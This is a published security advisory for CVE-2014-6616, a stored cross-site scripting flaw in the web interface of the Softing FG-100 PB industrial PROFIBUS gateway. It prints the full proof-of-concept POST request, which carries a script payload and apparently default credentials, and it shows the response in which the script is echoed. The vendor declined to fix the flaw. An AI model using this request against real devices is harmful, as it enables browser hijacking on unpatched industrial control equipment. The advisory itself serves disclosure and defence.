Softing FG-100 PB Cross Site Scripting

2014-11-05T00:00:00
ID PACKETSTORM:128975
Type packetstorm
Reporter Daniel Marzin
Modified 2014-11-05T00:00:00

Description

                                        
                                            `#############################################################  
#  
# COMPASS SECURITY ADVISORY  
# http://www.csnc.ch/en/downloads/advisories.html  
#  
#############################################################  
#  
# Product: Softing FG-100 PB  
# Vendor: Softing AG (www.softing.com)  
# CVD ID: CVE-2014-6616  
# Subject: XSS  
# Risk: High   
# Effect: Remotely exploitable  
# Author: Johannes Klick  
# Daniel Marzin  
# Ingmar Rosenhagen  
# Date: 05.11.2014   
#  
#############################################################  
  
Introduction:  
-------------  
Softing FG PROFIBUS [1] is a family of interfaces for remote access to  
one, two or three PROFIBUS segments via Ethernet for device  
parameterization, controller programming and data acquisition. This  
device is used in industrial setups for making Profibus device available  
via ethernet. Compass Security Deuschland GmbH [2] discovered a security  
flaw in the webgui of the device which allows execution of malicious  
code in the context of the user's browser session.  
  
Affected:  
---------  
Firmware: FG-x00-PB_V2.02.0.00  
  
Technical Description:  
----------------------  
The web gui does not properly encode output of user data in at least one  
place. Exploiting this vulnerability leads to stored cross-site  
scripting (XSS) and allows execution of JavaScript code   
  
The vulnerable resource is the 'DEVICE_NAME' parameter:  
  
POST /cgi-bin/CFGhttp HTTP/1.1  
Host: 192.168.2.3  
Referer: http://192.168.2.3/cgi-bin/CFGhttp  
  
second_chance=Yes&LOGIN=config&PASSWORD=password&SERIAL_NUMBER=0110000000&DE  
VICE_NAME=<SCRIPT>alert("XSS")</SCRIPT>&DEVICE_NAME_ORG=ROFLE&IPADDR=192.168  
.2.3&IPADDR_ORG=192.168.2.3&NETMASK=255.255.255.0&NETMASK_ORG=255.255.255.0&  
GATEWAY=0.0.0.0&GATEWAY_ORG=&MAINTENANCE_IP=192.168.212.231&MAINTENANCE_IP_O  
RG=192.168.212.231&STARTUP=RELOAD  
  
Which results in the malicious code being embedded:  
  
HTTP/1.0 200 OK  
Content-type: text/html  
Cache-Control: no-cache, must-revalidate  
Pragma: no-cache  
  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01  
Transitional//EN""http://www.w3.org/TR/html4/strict.dtd">  
<html><head><title>Device Configuration</title></head><link  
rel="stylesheet" type="text/css"  
href="../fg300_pb/styles/fg300_pb.css"><body><h1>New Network  
Settings</h1><table cellspacing=0 summary=""><tr><td><strong> Host Name  
</strong></td><td> <SCRIPT>alert("XSS")</SCRIPT> </td><td>  
</td></tr><tr><td><strong> IP Address </strong></td><td> 192.168.2.3  
</td><td> </td></tr><tr><td><strong> Subnet Mask  
</strong></td><td> 255.255.255.0 </td><td>  
</td></tr><tr><td><strong> Default Gateway </strong></td><td>  
</td><td> </td></tr><tr><td><strong> Maintenance IP Address  
</strong></td><td> 192.168.212.231 </td><td>  
</td></tr><tr><td><strong> New network parameters will be used  
</strong></td><td> immediately  
</td><td></td></tr></table><br></body></html>  
  
  
  
Workaround / Fix:  
-----------------  
no patch is available  
  
Timeline:  
---------  
Vendor Notified: 2014-09-15   
Vendor Response: 2014-10-24   
Vendor Status: Wont fix  
  
References:  
-----------  
[1]:  
http://industrial.softing.com/de/produkte/profibus-master-or-slave-configura  
ble-single-channel-remote-interface.html  
[2]: http://www.csnc.de  
  
  
`